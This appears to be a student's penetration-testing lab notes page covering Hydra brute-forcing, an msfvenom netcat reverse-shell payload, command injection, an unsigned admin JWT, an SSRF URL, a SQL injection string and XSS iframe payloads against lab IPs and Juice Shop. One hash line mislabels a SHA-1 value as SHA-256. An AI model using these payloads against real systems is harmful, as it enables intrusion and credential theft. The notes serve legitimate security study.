Tools

Jcrypt tool

Open SSL

fcrackzip

Note App - Keep Note, Cherry Tree, Joplin, One Note GreenShot, ShareX ipaddressguide.com whois

Nmap

Hydra - password cracking to scan all port -p- --open (open ports)

telnet [ip] [port]" 10.10.98.241

.RUN ping 10.10.209.129 -c 1 .RUN msfvenom -p cmd/unix/reverse_netcat 10.10.209.129 lport=4444 R

nc -lvp 4444

-p = payload lhost = our local host IP address (this is your machine's IP address) lport = the port to listen on (this is the port on your machine) R = export the payload in raw format

FTP Ip - 10.10.74.134 login ftp [IP] Username - Mike

Hydra Syntax - "hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp" -t 4 Number of parallel connections per target -l [user] Points to the user who's account you're trying to compromise -P [path to dictionary] Points to the file containing the list of possible passwords -vV Sets verbose mode to very verbose, shows the login+pass combination for each attempt [machine IP] The IP address of the target machine ftp / protocol Sets the protocol

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.74.134 ftp

Network services 2

Ip - 10.10.66.215 ls -la - see hidden files sudo mount -t nfs 10.10.66.215:home /tmp/mount/ -nolock id_rsa.pub file contains username

SNMP Using Metasploit IP - 10.10.222.254

msfconsole - start metasploit

help - to view commands options

run - to run exploit

username - administrator

password type of smtp server - Popstfix (ubuntu)

Cracking using hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.222.254 ssh

Crackstation - Online Password cracker https://crackstation.net/

sqlite3 to access database Syntax - sqlite3 see tables using .tables command use pragma table_info(selected table); to see the table information use select * from users;

command line injection $(command)

Outdated components exploit Exploit Database - https://www.exploit-db.com/ searchsploit command python3 file.py -h url - python3 47887.py http://10.10.116.26:84

To calculate the different hashes in Linux, we can use the following commands:

md5sum WinSCP-5.21.5-Setup.exe 20c5329d7fde522338f037a7fe8a84eb

sha1sum WinSCP-5.21.5-Setup.exe c55a60799cfa24c1aeffcd2ca609776722e84f1b

sha256sum WinSCP-5.21.5-Setup.exe c55a60799cfa24c1aeffcd2ca609776722e84f1b

MD5: 20c5329d7fde522338f037a7fe8a84eb SHA-1: c55a60799cfa24c1aeffcd2ca609776722e84f1b SHA-256: e141e9a1a0094095d5e26077311418a01dac429e68d3ff07a734385eb0172bea

Hash Generator https://www.srihash.org/

use this online tool to encode/decode base64

https://appdevtools.com/base64-encoder-decoder

{"typ":"JWT","alg":"none"}.{"username":"admin","exp":1698129274}.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjk4MTI5Mjc0fQ==.

http://10.10.116.26:8087/download?server=secure-file-storage.com:8087&id=75482342

http://10.10.116.26:8087/download?server=10.11.56.194:8087&id=75482342

passwordz mcsafes mc.safesearch@juice-sh.op My Noodles - Mr. N00dles

admin@juice-sh.op admin123

SQL injecction

' or 1=1-- email --,

bruteforce password using burp

Persistent XXS Scripting Add Header as part of payload True-Client-IP

True-Client-IP <iframe src="Javascript:alert('xss')">

Reflected XSS paste iframe url into as part of webpage -

paste iframe url as part of webpage : <iframe src="Javascript:alert('xss')">

PreviousNmap NextMetaspolit

Last updated 9 months ago